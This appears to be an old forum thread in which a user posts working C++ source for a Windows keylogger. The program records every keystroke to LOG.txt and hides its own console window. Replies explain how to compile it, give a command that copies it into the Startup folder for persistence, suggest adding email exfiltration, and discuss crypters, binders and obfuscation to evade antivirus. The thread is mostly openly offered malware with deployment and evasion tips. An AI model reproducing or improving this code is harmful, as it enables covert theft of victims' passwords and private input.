Keyloggers
@….@
EEEEE EEEEE EEEEE EEEEE EEEEE EEE
E E E E E EEE
EEE EEE EEE EEE EEE EE
E E E E E
EEEEE EEEEE EEEEE EEEEE EEEEE @
EEEEE EEEEE EEEEE EEEEE EEEEE EEE
E E E E E EEE
EEE EEE EEE EEE EEE EE
E E E E E
EEEEE EEEEE EEEEE EEEEE EEEEE @
you can create keylogger using notepad ++ with c++ languange .
heres the code
```#include
using namespace std;
include <windows.h>
include <winuser.h>
int Save (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
unsigned char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,“LOG.txt”);
}
}
cin.get();
return 0;
}
/ ********************************* /
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, “a+”);
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, “%s”, “[BACKSPACE]”);
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, “%s”, “\n”);
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, “%s”, “ ”);
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, “%s”, “[TAB]”);
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, “%s”, “[SHIFT]”);
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, “%s”, “[CONTROL]”);
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, “%s”, “[ESCAPE]”);
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, “%s”, “[END]”);
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, “%s”, “[HOME]”);
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, “%s”, “[LEFT]”);
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, “%s”, “[UP]”);
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, “%s”, “[RIGHT]”);
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, “%s”, “[DOWN]”);
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, “%s”, “.”);
else
fprintf(OUTPUT_FILE, “%s”, &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/ ********************************* /
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA(“ConsoleWindowClass”, NULL);
ShowWindow(Stealth,0);
}```
already try it and it really works
when the time has come , I shall rise and conquer the world
when the time has come , I shall rise and conquer the world
EEEEE EEEEE EEEEE EEEEE EEEEE EEE
E E E E E EEE
EEE EEE EEE EEE EEE EE
E E E E E
EEEEE EEEEE EEEEE EEEEE EEEEE @
11 years ago
0
after coping this code to notepad in with file type it should b saved *.exe???
i tryed it n saved as exe but didn’t run.
You’ll need to compile it first :) Tutorial
I would love to change the world, but they won’t give me the source code.
11 years ago
0
tryed it using CodeBlock but gave me an error that someting is not declared…
Yeah you will have to add
#include <stdio.h>
should work then.. and I wouldn’t use Code::Blocks..
I prefer this: http://www.wikihow.com/Install-MinGW-%28Minimalist-Gnu-C/C%2B%2B-Compiler%29-on-Microsoft-Windows
(Tutorial how to install everything)
11 years ago
0
i’ll gave it a try but its late now or i should say its morning here 05 00 Am so am sleeping now…
save as exe ? why must save as exe . oh my bad it is Dev C++ download here just press ctrl+ f9 or compile the file then ok . the file will automatically will be a executable file . sorry for the mistake
when the time has come , I shall rise and conquer the world
when the time has come , I shall rise and conquer the world
Well I’d still prefer Code::Blocks to DevC++ but MinGW beats both. (My opinion)
What anti-virus do you use? I guess you can allow the program to start.. You can check the source code, it just checks what key is pressed and writes it in the textfile “LOG.txt”..
but must click it every time want to run it after reboot . hurm…. @coldiv have any suggestion for the program to run automatically ?
when the time has come , I shall rise and conquer the world
Copy it to auto-start? Shouldn’t be that hard.
(Win+R -> cmd -> type in the following command)
xcopy keylogger.exe %userprofile%\STARTM~1\Programs\Startup\keylogger.exe
But who would want this on his own PC to run all the time?
EEEEE EEEEE EEEEE EEEEE EEEEE EEE
E E E E E EEE
EEE EEE EEE EEE EEE EE
E E E E E
EEEEE EEEEE EEEEE EEEEE EEEEE @
when the time has come , I shall rise and conquer the world
ya it works add email to it make it a class and add at startup very easy and would work c++ kicks ass c# is super easy
i bake therefore im fried!!
ya it works add email to it make it a class and add at startup very easy and would work c++ kicks ass c# is super easy
i bake therefore im fried!!
- @IAmDevil
Its good to be back! :D
When solving problems, dig at the roots instead of just hacking at the leaves.
The problem is not achieving the keylogger but make it invisible to antivirus. For this reason, it is important to ensure that the keylogger will become FUD (Fully Undetectable) using a combination of tools such as Crypter and Binder.
daVinciCode
- @IAmDevil
Its good to be back! :D
For example, the files obtained with Simple Binder are immediately detected by the antivirus McAfee as “Generic Dropper.ji” trojan and instantly removed. Get a true FUD need great skill. Happy hacking!
daVinciCode
actually thats where i have seen people making mistakes you do not need a crypter if you know how to code it will be fud and second of all if you use a deobfuscator it will change all of it so it cant be detected
i bake therefore im fried!!
@oxide : Tell us how you do it.
Thanks.
Just because I am paranoid doesnt mean theyre not after me…